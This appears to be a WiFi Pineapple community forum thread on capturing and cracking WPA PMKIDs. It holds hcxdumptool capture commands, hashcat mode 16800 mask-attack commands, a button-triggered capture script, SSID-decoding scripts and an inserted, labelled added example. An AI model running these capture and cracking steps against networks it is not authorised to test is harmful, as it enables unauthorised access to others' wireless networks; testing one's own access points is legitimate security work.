Zylla

PMKID Attack on WiFi Pineapples


5 minutes ago, Zylla said:

So just a heads up that it might be a while until updates are coming, and the module I had started working on.

Ahhh man that sucks, hopefully you get back on track ASAP. Enjoy the break away from keyboard?

9 hours ago, Just_a_User said:

Ahhh man that sucks, hopefully you get back on track ASAP. Enjoy the break away from keyboard?

Thanks. I'm hoping to get back on track ASAP.

@Sleezybax
That'd be really helpful. I got some components myself that could boost performance, like RAM and SSD disks lying around.
I'm not looking for a beast laptop for gaming and such. But still something that's stable and works.
Like, if I was to purchase a new one today in the stores, I'd probably focus on the CPU.
Do you have any details on the "asset" you mentioned?
Thanks a lot for attempting to help out.

  • Like 1


OK, once I've captured a .pcapng file, how can I find out what SSIDs it has captured details for? Or do I have to manually compare BSSIDs?

2 minutes ago, PixL said:

OK, once I've captured a .pcapng file, how can I find out what SSIDs it has captured details for? Or do I have to manually compare BSSIDs?

When you convert to *.16800 you can cat the file and see each MAC/BSSID but no ESSID.

I started using filters to be more targeted against my test APs

e.g.

hcxdumptool -o /root/PMKIDS/local.pcapng -i wlan1mon --enable_status 4 --filterlist /root/targetlist.txt --filtermode 2

This thing is so fast it can pick up car APs before they are out of range if you're not careful.

19 minutes ago, Just_a_User said:

This thing is so fast it can pick up car APs before they are out of range if you're not careful.

Only thing limiting it would be which channel it was scanning at the time I guess.

2 minutes ago, PixL said:

Only thing limiting it would be which channel it was scanning at the time I guess.

yup, default is 5s per chan but can be dialed down further.


What I'm unsure of is if there is any difference to using:

1. hcxpcaptool -z test.16800 test.pcapng then using hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

or

2. hcxpcaptool -o test.hccapx test.pcapng then using hashcat -m 2500 test.hccapx -a 3 -w 3 '?l?l?l?l?l?lt!'

7 hours ago, PixL said:

What I'm unsure of is if there is any difference to using:

1. hcxpcaptool -z test.16800 test.pcapng then using hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

or

2. hcxpcaptool -o test.hccapx test.pcapng then using hashcat -m 2500 test.hccapx -a 3 -w 3 '?l?l?l?l?l?lt!'

hashcat forum thread says

Quote

There's also support for hash-mode 16801, which allows skipping the computation of the PMK - which is the computation that makes cracking WPA so slow.

 


Just_a_User:

Actually this is not what I mean, 16801 means you supply hashcat with pre-hashed PMKs as hex strings. My above question is about 16800, which is expecting a normal text file of passwords.

1 hour ago, PixL said:

Just_a_User:

Actually this is not what I mean, 16801 means you supply hashcat with pre-hashed PMKs as hex strings. My above question is about 16800, which is expecting a normal text file of passwords.

Oh shoot, my bad. All I found so far is hash-mode 16800 = WPA-PMKID-PBKDF2.

Edited by Just_a_User

22 hours ago, PixL said:

OK, once I've captured a .pcapng file, how can I find out what SSIDs it has captured details for? Or do I have to manually compare BSSIDs?

OK, I've answered my own question: take the converted test.16800 file, open it in Notepad, then copy the last column from each line (delimited by *) and run it from hex to ASCII... voila, you get your SSID.

  • Like 1

On 8/22/2018 at 10:34 PM, Just_a_User said:

Just a note, new version on Tetra is back in action and the filters work a treat. This thing is so, so fast it's amazing really. And perfect for the Pineapple's button script

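#!/bin/bash
# Toggle script for the Pineapple button: the first press starts a capture,
# the second press stops it and converts the result to hashcat 16800 format.
file="/tmp/handshake"
# Random three-digit prefix for the saved files
capture="$(head -30 /dev/urandom | tr -dc "0123456789" | head -c3)"
if [ -f "$file" ]
then
        # Flag file exists: a capture is running, so stop and convert it
        killall hcxdumptool
        led YELLOW off
        rm -f "$file"
        hcxpcaptool -z test.16800 test.pcapng > test.conlog
        mv test.pcapng "/root/$capture.pcapng"
        mv test.16800 "/root/$capture.16800"
        mv test.conlog "/root/$capture.conlog"
        mv test.log "/root/$capture.log"
else
        # No flag file: mark the capture as running and start hcxdumptool
        touch "$file"
        led YELLOW on
        hcxdumptool -o test.pcapng -t 2 -i wlan1mon --enable_status=3 --disable_deauthentications --disable_disassociations > test.log &
fi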

1. Click once and it starts capturing PMKID and lights the yellow LED.

2. Click again and it stops capturing, converts the data to 16800 and moves them to /root/random.pcapng and /root/random.16800, turns off the yellow LED and dumps a /root/random.log with the hcxdumptool output and random.conlog with the hcxpcaptool output.

Edited by PixL
  • Like 1


OK, so I've made a small script to convert the hex-encoded SSID back to text... can anyone improve on this and maybe make something that will take a list of PMKIDs and convert to a list of SSIDs?

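#!/bin/bash
# Convert a hex-encoded string (e.g. the last column of a .16800 line) to text
function hex2string () {
  local i=0
  while [ "$i" -lt "${#1}" ]
  do
    # Emit one byte for each pair of hex digits
    printf "\\x${1:$i:2}"
    i=$((i + 2))
  done
}
read -r -p 'Hexstring: ' varname
hex2string "$varname"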

 

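An added example, not part of PixL's post or of hcxtools: one way to turn a whole converted .16800 file into a list of BSSIDs and SSIDs, as asked above. It assumes the record layout PMKID*MAC_AP*MAC_STA*ESSID (all hex); the function names `list_essids` and `sample_16800` and the sample records are constructed for illustration.

```shell
#!/bin/sh
# Added example: list BSSID and ESSID for each record of a hashcat
# mode-16800 file. Record layout: PMKID*MAC_AP*MAC_STA*ESSID (all hex).

# Decode a hex string. Bytes outside printable ASCII become '?', since an
# ESSID is chosen by whoever runs the AP and may hold terminal escapes.
hex2string() {
    case "$1" in
        *[!0-9A-Fa-f]*) return 1 ;;          # not hex: refuse to decode
    esac
    [ $(( ${#1} % 2 )) -eq 0 ] || return 1    # need whole bytes
    for pair in $(printf '%s' "$1" | sed 's/../& /g'); do
        # hex pair -> octal escape -> raw byte (portable, no \x needed)
        printf "\\$(printf '%03o' "0x$pair")"
    done | LC_ALL=C tr -c '[:print:]' '?'
}

# Read 16800 records on stdin, print "BSSID<TAB>ESSID" once per AP/name.
list_essids() {
    while IFS='*' read -r pmkid ap sta essid_hex; do
        # skip anything that is not a well-formed record
        [ ${#pmkid} -eq 32 ] && [ ${#ap} -eq 12 ] && [ ${#sta} -eq 12 ] || continue
        essid=$(hex2string "$essid_hex") || continue
        printf '%s\t%s\n' "$ap" "$essid"
    done | sort -u
}

# Constructed sample records (not from a real capture). The third ESSID
# starts with ESC [ 2 J, the fourth line is junk.
sample_16800() {
    cat <<'EOF'
00112233445566778899aabbccddeeff*020000000001*020000000101*4c61624150
ffeeddccbbaa99887766554433221100*020000000001*020000000102*4c61624150
0123456789abcdef0123456789abcdef*020000000002*020000000103*1b5b324a4150
not-a-16800-line
EOF
}

sample_16800 | list_essids
```

Against a converted capture it is run as `list_essids < capture.16800`, where the file name stands for whatever hcxpcaptool wrote.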

Hey guys,

Has anyone actually tried installing this in an OS like Kali or Ubuntu?

If so, can you tell me what version of the OS worked for you? I simply can't get this to work on Kali or Ubuntu. (Raspberry Pi 3b+ version)

thanks!

 


@Zylla

Sorry for the late reply, got hit by RL. Had a dig through the basement, was sure I still had a Lenovo T420 lying around. Turns out all I got left of old stuff is an Acer something with just an i3 in it. So if CPU is what you are looking for, I doubt this one will be worth shipping.

On 9/2/2018 at 7:05 PM, cheeto said:

Hey guys,

Has anyone actually tried installing this in an OS like Kali or Ubuntu?

If so, can you tell me what version of the OS worked for you? I simply can't get this to work on Kali or Ubuntu. (Raspberry Pi 3b+ version)

thanks!

 

It was working perfectly on my Kali installation, until my laptop died.

I have an RPI3B+, and I haven't tested it there myself, it should be working on it according to the developer. (ZerBea)

Check if you have all dependencies installed before compiling.


Thanks for this! I had some good fun with a friend creating a module to expose these tools on the Nano today. I'll see if I can tidy it up into something presentable for the end of the week.


I would also like to notify people (since it's been discussed earlier in the thread) that I was able to compile this without any problems on my Raspberry Pi 3b+.
And it's working perfectly.


FYI, I don't seem to be getting any successful captures on the most recent packages you uploaded. I'm just testing the previous version to see if I've done something weird on my Pineapple.

12 hours ago, Zylla said:

I would also like to notify people (since it's been discussed earlier in the thread) that I was able to compile this without any problems on my Raspberry Pi 3b+.
And it's working perfectly.

Congrats!!!

You wouldn't happen to have the link to the version of Kali that works on the Raspberry Pi 3b+?

I have Kali on my 3b+ but I think it's a patched up version.

It's my understanding that there is no official version of Kali for 3b+. Instead it's a modified version from the RP 3. Right?

Also, doesn't PMKID require more GPU? If that's the case, I would imagine that it's pretty slow on the Nano and the RP3b+.

 

Thanks!!

5 hours ago, cheeto said:

Congrats!!!

You wouldn't happen to have the link to the version of Kali that works on the Raspberry Pi 3b+?

I have Kali on my 3b+ but I think it's a patched up version.

It's my understanding that there is no official version of Kali for 3b+. Instead it's a modified version from the RP 3. Right?

Also, doesn't PMKID require more GPU? If that's the case, I would imagine that it's pretty slow on the Nano and the RP3b+.

 

Thanks!!

Kali is based on Debian, the only "modified versions" I can think of are the images you can download containing the Nexmon patches, making you able to run wlan0 in monitor-mode (and AP mode at the same time).

But that's just a kernel patch.

Here's a link for a great version: https://re4son-kernel.com/re4son-pi-kernel/

And yeah, same with the Pineapple. You don't use hashcat on these devices to crack the PMKID, you transfer the captures from the device to your desktop which hopefully has a GPU or something.
